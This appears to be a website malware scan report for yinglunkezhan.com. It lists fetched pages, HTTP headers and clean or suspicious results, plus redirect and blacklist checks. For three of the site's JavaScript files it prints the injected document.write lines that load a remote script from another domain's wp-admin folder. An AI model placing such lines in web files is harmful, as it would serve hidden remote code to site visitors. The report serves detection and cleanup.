Scanned pages/files
| Request | Server response | Status |
http://yinglunkezhan.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 11:12:30 GMT Location: http://www.yinglunkezhan.com/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.yinglunkezhan.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 11:12:30 GMT Location: http://www.yinglunkezhan.com/f/allcity.php Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: USR=w7ywr8bq%090%091412507550%09http%3A%2F%2Fwww.yinglunkezhan.com%2F Set-Cookie: From_City=0; expires=Sat, 05-Oct-2013 11:12:30 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://www.yinglunkezhan.com/f/allcity.php | 200 OK Content-Length: 43239 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/images/default/inc.js | 200 OK Content-Length: 3148 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script src="http://www.sudostroy.com/wp-admin/zhueXTTv.php?id=51445811" type="text/javascript"></script>'); | ||
http://www.yinglunkezhan.com/images/default/default.js | 200 OK Content-Length: 6051 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script src="http://www.sudostroy.com/wp-admin/zhueXTTv.php?id=51445809" type="text/javascript"></script>'); | ||
http://www.yinglunkezhan.com/images/default/swfobject.js | 200 OK Content-Length: 7030 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script src="http://www.sudostroy.com/wp-admin/zhueXTTv.php?id=51445830" type="text/javascript"></script>'); | ||
http://www.yinglunkezhan.com/do/hack.php?hack=login&job=js | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/reg.php | 200 OK Content-Length: 24560 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/a_d_s.php?job=js&ad_id=AD_4923 | 200 OK Content-Length: 309 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/\'http://www.yinglunkezhan.com/do/a_d_s.php?job=jump&id=2&u_id=&url=aHR0cDovL3d3dy55aW5nbHVua2V6aGFuLmNvbS8yMDExLTIwMTJwcmljZWxpc3QucGRm\' | 404 Not Found Content-Length: 363 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/hack/count.php?fid=1 | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/login.php | 200 OK Content-Length: 25628 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/ | 200 OK Content-Length: 1300 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/a_d_s.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/do/activate.php | 200 OK Content-Length: 23823 Content-Type: text/html | clean |
http://www.yinglunkezhan.com/search.php | 200 OK Content-Length: 33315 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yinglunkezhan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:12:30 GMT
Location: http://www.yinglunkezhan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: yinglunkezhan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:12:30 GMT
Location: http://www.yinglunkezhan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yinglunkezhan.com
Referer: http://www.google.com/search?q=yinglunkezhan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yinglunkezhan.com
Referer: http://www.google.com/search?q=yinglunkezhan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yinglunkezhan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yinglunkezhan.com/
Result: yinglunkezhan.com is not infected or malware details are not published yet.
Result: yinglunkezhan.com is not infected or malware details are not published yet.